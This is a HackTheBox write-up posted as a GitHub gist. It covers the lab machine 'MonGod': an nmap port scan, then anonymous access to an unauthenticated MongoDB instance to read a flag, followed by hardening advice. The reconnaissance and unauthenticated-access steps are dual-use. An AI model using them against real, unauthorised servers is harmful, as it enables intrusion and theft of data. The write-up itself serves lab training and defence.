Skip to content

Instantly share code, notes, and snippets.

@cywf

cywf/mongod-htb-writeup.md

Created September 10, 2023 03:41
Show Gist options
  • Save cywf/dc1bc8f34b0fab5d95314ec492c8f7f2 to your computer and use it in GitHub Desktop.
Save cywf/dc1bc8f34b0fab5d95314ec492c8f7f2 to your computer and use it in GitHub Desktop.
Download ZIP
HackTheBox Write-up: MonGod
Raw
mongod-htb-writeup.md

Machine Details:

  • Machine Name: MonGod
  • IP Address: 10.129.60.233
  • User: cywf

What I Did:

1. NMAP Scan: I started by running an NMAP scan to identify open ports and services running on the target machine.

$nmap -p- -T4 -sV 10.129.60.233

Results:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-10 04:10 BST
Nmap scan report for 10.129.60.233
Host is up (0.070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open  mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.42 seconds

2. MongoDB Exploration: After identifying that MongoDB was running on port 27017, I proceeded to connect to it.

First, I installed the MongoDB command-line tools:

curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz
tar xvf mongodb-linux-x86_64-3.4.7.tgz

Then, I connected to the MongoDB server:

./mongo mongodb://10.129.60.233:27017

Upon connection, I listed the databases and inspected the sensitive_information database:

> show dbs
> use sensitive_information;
> show collections;
> db.flag.find().pretty();

Vulnerability:

The MongoDB instance on the target machine was misconfigured, allowing anonymous connections without any authentication. This allowed me to access the databases and retrieve sensitive information.

How to Patch:

  1. Enable Authentication: Ensure that MongoDB is running with authentication enabled. This can be done by setting the --auth flag when starting the MongoDB server.
  2. Bind to localhost: If the MongoDB instance is not intended to be accessed externally, bind it to localhost (127.0.0.1).
  3. Firewall Rules: Implement firewall rules to restrict access to the MongoDB port (27017 by default) only to trusted IP addresses.
  4. Regularly Update: Ensure that MongoDB is regularly updated to the latest version to benefit from security patches and improvements.
  5. Monitor Logs: Regularly monitor MongoDB logs for any suspicious activity or unauthorized access attempts.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment